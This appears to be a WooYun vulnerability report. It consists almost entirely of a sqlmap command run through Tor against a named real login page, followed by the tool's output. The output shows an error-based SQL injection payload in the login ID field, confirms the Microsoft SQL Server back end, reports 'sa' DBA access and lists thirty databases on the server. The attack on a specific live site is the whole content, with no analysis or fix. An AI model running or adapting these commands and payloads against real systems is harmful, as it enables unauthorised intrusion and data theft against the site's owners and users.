WooYun.org

./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=BEUT --union-char=N -u "http://www.nid.com.tw/sales/login.aspx" --data="__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE4NDY5MDUxNzVkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQtodG1sX1N1Ym1pdAUKaHRtbF9SZXNldBescP2gXOCrXspeBZbQJdkwL5iI&__EVENTVALIDATION=%2FwEWBQKPqr34AgKw47aJDQLVurzPAQKTsonqAQKG8pyoAhs4YXG%2FxUR04nz6HnbjttsF6MbN&html_SalesID=A&html_SalesPwd=B&html_Submit.x=29&html_Submit.y=33" --threads=3
 ---
Parameter: html_SalesID (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTE4NDY5MDUxNzVkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQtodG1sX1N1Ym1pdAUKaHRtbF9SZXNldBescP2gXOCrXspeBZbQJdkwL5iI&__EVENTVALIDATION=/wEWBQKPqr34AgKw47aJDQLVurzPAQKTsonqAQKG8pyoAhs4YXG/xUR04nz6HnbjttsF6MbN&html_SalesID=A' AND 6268=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (6268=6268) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(107)+CHAR(113))) AND 'KelF'='KelF&html_SalesPwd=B&html_Submit.x=29&html_Submit.y=33
---
[16:30:19] [INFO] testing Microsoft SQL Server
[16:30:21] [INFO] confirming Microsoft SQL Server
[16:30:29] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current user:    'sa'
current user is DBA:    True
available databases [30]:
[*] 20120903
[*] 2marry
[*] 2narry
[*] carpenter
[*] cookery
[*] customer
[*] electr
[*] fop
[*] hottaiwan
[*] longder
[*] love
[*] master
[*] model
[*] msdb
[*] nationwideunion
[*] nid
[*] ntpu
[*] rbva-roc
[*] sales
[*] salico
[*] sanyinggas
[*] taipeibeauty
[*] TASTE
[*] tempdb
[*] Test
[*] tradeunion
[*] TRETSA
[*] unionet3c
[*] unions
[*] yesall